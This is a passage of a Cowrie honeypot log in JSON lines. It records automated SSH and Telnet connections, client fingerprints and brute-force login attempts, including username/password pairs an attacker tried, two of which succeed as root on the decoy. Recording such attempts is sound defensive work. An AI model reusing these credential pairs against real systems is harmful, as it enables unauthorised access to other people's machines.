CS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:30.674936Z","src_ip":"212.227.235.229","session":"10134b915200"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:15:31.715029Z","src_ip":"212.227.235.229","session":"10134b915200"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:31.922420Z","src_ip":"212.227.235.229","session":"0cc1db6ab3b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54128,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d7522a83a7a","protocol":"ssh","message":"New connection: 212.227.235.229:54128 (1.2.3.4:22) [session: 2d7522a83a7a]","sensor":"my-vps","timestamp":"2025-09-09T02:15:32.160036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:32.160876Z","src_ip":"212.227.235.229","session":"2d7522a83a7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:32.414985Z","src_ip":"212.227.235.229","session":"2d7522a83a7a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:32.976068Z","src_ip":"212.227.235.229","session":"10134b915200"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34184,"dst_ip":"1.2.3.4","dst_port":22,"session":"42432d270fcf","protocol":"ssh","message":"New connection: 212.227.235.229:34184 (1.2.3.4:22) [session: 42432d270fcf]","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.322473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.323955Z","src_ip":"212.227.235.229","session":"42432d270fcf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.448952Z","src_ip":"212.227.235.229","session":"2d7522a83a7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.623098Z","src_ip":"212.227.235.229","session":"42432d270fcf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.697252Z","src_ip":"212.227.235.229","session":"2d7522a83a7a"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:33.698869Z","src_ip":"212.227.235.229","session":"b0447c0f858a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:15:34.865841Z","src_ip":"212.227.235.229","session":"42432d270fcf"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:35.166127Z","src_ip":"212.227.235.229","session":"f3e1a9c70349"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:35.167299Z","src_ip":"212.227.235.229","session":"42432d270fcf"}
{"eventid":"cowrie.session.closed","duration":12.780128955841064,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:41.558803Z","src_ip":"212.227.125.160","session":"d7667eb83e3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44293,"dst_ip":"1.2.3.4","dst_port":23,"session":"665ed71f2ac8","protocol":"telnet","message":"New connection: 212.227.125.160:44293 (1.2.3.4:23) [session: 665ed71f2ac8]","sensor":"my-vps","timestamp":"2025-09-09T02:15:41.773163Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60478,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c61d75478f8","protocol":"ssh","message":"New connection: 212.227.235.229:60478 (1.2.3.4:22) [session: 8c61d75478f8]","sensor":"my-vps","timestamp":"2025-09-09T02:15:47.342783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:47.348656Z","src_ip":"212.227.235.229","session":"8c61d75478f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:47.719780Z","src_ip":"212.227.235.229","session":"8c61d75478f8"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"abc123","message":"login attempt [sshd/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:15:49.221389Z","src_ip":"212.227.235.229","session":"8c61d75478f8"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:50.597620Z","src_ip":"212.227.235.229","session":"8c61d75478f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50486,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdb9f6f1536b","protocol":"ssh","message":"New connection: 212.227.235.229:50486 (1.2.3.4:22) [session: cdb9f6f1536b]","sensor":"my-vps","timestamp":"2025-09-09T02:15:52.709348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:15:52.711411Z","src_ip":"212.227.235.229","session":"cdb9f6f1536b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:15:52.794260Z","src_ip":"212.227.235.229","session":"cdb9f6f1536b"}
{"eventid":"cowrie.login.failed","username":"pablo","password":"pablo","message":"login attempt [pablo/pablo] failed","sensor":"my-vps","timestamp":"2025-09-09T02:15:53.128600Z","src_ip":"212.227.235.229","session":"cdb9f6f1536b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:54.215581Z","src_ip":"212.227.235.229","session":"cdb9f6f1536b"}
{"eventid":"cowrie.session.closed","duration":12.787512063980103,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:54.560607Z","src_ip":"212.227.125.160","session":"665ed71f2ac8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44531,"dst_ip":"1.2.3.4","dst_port":23,"session":"37acbba858e1","protocol":"telnet","message":"New connection: 212.227.125.160:44531 (1.2.3.4:23) [session: 37acbba858e1]","sensor":"my-vps","timestamp":"2025-09-09T02:15:54.790704Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:57.939323Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.session.closed","duration":180.16618275642395,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:15:57.945420Z","src_ip":"212.227.125.160","session":"d5e2ab2f5c7c"}
{"eventid":"cowrie.session.closed","duration":12.788914918899536,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:07.579524Z","src_ip":"212.227.125.160","session":"37acbba858e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44868,"dst_ip":"1.2.3.4","dst_port":23,"session":"95ea6b0c6561","protocol":"telnet","message":"New connection: 212.227.125.160:44868 (1.2.3.4:23) [session: 95ea6b0c6561]","sensor":"my-vps","timestamp":"2025-09-09T02:16:07.800133Z"}
{"eventid":"cowrie.session.closed","duration":12.735392093658447,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:20.535457Z","src_ip":"212.227.125.160","session":"95ea6b0c6561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37328,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ad6af46779b","protocol":"ssh","message":"New connection: 212.227.235.229:37328 (1.2.3.4:22) [session: 9ad6af46779b]","sensor":"my-vps","timestamp":"2025-09-09T02:16:31.467503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:16:31.469526Z","src_ip":"212.227.235.229","session":"9ad6af46779b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:16:31.723770Z","src_ip":"212.227.235.229","session":"9ad6af46779b"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"gbase","message":"login attempt [gbase/gbase] failed","sensor":"my-vps","timestamp":"2025-09-09T02:16:32.756763Z","src_ip":"212.227.235.229","session":"9ad6af46779b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56676,"dst_ip":"1.2.3.4","dst_port":22,"session":"fafbee6e01c3","protocol":"ssh","message":"New connection: 212.227.235.229:56676 (1.2.3.4:22) [session: fafbee6e01c3]","sensor":"my-vps","timestamp":"2025-09-09T02:16:33.060303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:16:33.061248Z","src_ip":"212.227.235.229","session":"fafbee6e01c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:16:33.321584Z","src_ip":"212.227.235.229","session":"fafbee6e01c3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:34.018732Z","src_ip":"212.227.235.229","session":"9ad6af46779b"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123123","message":"login attempt [dev/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:16:34.411587Z","src_ip":"212.227.235.229","session":"fafbee6e01c3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:35.675460Z","src_ip":"212.227.235.229","session":"fafbee6e01c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58096,"dst_ip":"1.2.3.4","dst_port":22,"session":"f91d5059b286","protocol":"ssh","message":"New connection: 212.227.235.229:58096 (1.2.3.4:22) [session: f91d5059b286]","sensor":"my-vps","timestamp":"2025-09-09T02:16:48.333796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:16:48.335095Z","src_ip":"212.227.235.229","session":"f91d5059b286"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:16:48.419811Z","src_ip":"212.227.235.229","session":"f91d5059b286"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T02:16:48.799365Z","src_ip":"212.227.235.229","session":"f91d5059b286"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:49.886946Z","src_ip":"212.227.235.229","session":"f91d5059b286"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58222,"dst_ip":"1.2.3.4","dst_port":22,"session":"e47350cfcf79","protocol":"ssh","message":"New connection: 212.227.235.229:58222 (1.2.3.4:22) [session: e47350cfcf79]","sensor":"my-vps","timestamp":"2025-09-09T02:16:56.652127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:16:56.659870Z","src_ip":"212.227.235.229","session":"e47350cfcf79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:16:57.040455Z","src_ip":"212.227.235.229","session":"e47350cfcf79"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"Password1","message":"login attempt [jenkins/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:16:58.567423Z","src_ip":"212.227.235.229","session":"e47350cfcf79"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:16:59.956209Z","src_ip":"212.227.235.229","session":"e47350cfcf79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51688,"dst_ip":"1.2.3.4","dst_port":22,"session":"08fa4f58f75c","protocol":"ssh","message":"New connection: 212.227.235.229:51688 (1.2.3.4:22) [session: 08fa4f58f75c]","sensor":"my-vps","timestamp":"2025-09-09T02:17:01.256907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:17:01.257733Z","src_ip":"212.227.235.229","session":"08fa4f58f75c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:17:01.366892Z","src_ip":"212.227.235.229","session":"08fa4f58f75c"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:17:01.859405Z","src_ip":"212.227.235.229","session":"08fa4f58f75c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:17:02.972671Z","src_ip":"212.227.235.229","session":"08fa4f58f75c"}
{"eventid":"cowrie.session.connect","src_ip":"45.227.254.151","src_port":8778,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea2ba4827fc9","protocol":"telnet","message":"New connection: 45.227.254.151:8778 (1.2.3.4:23) [session: ea2ba4827fc9]","sensor":"my-vps","timestamp":"2025-09-09T02:17:07.257539Z"}
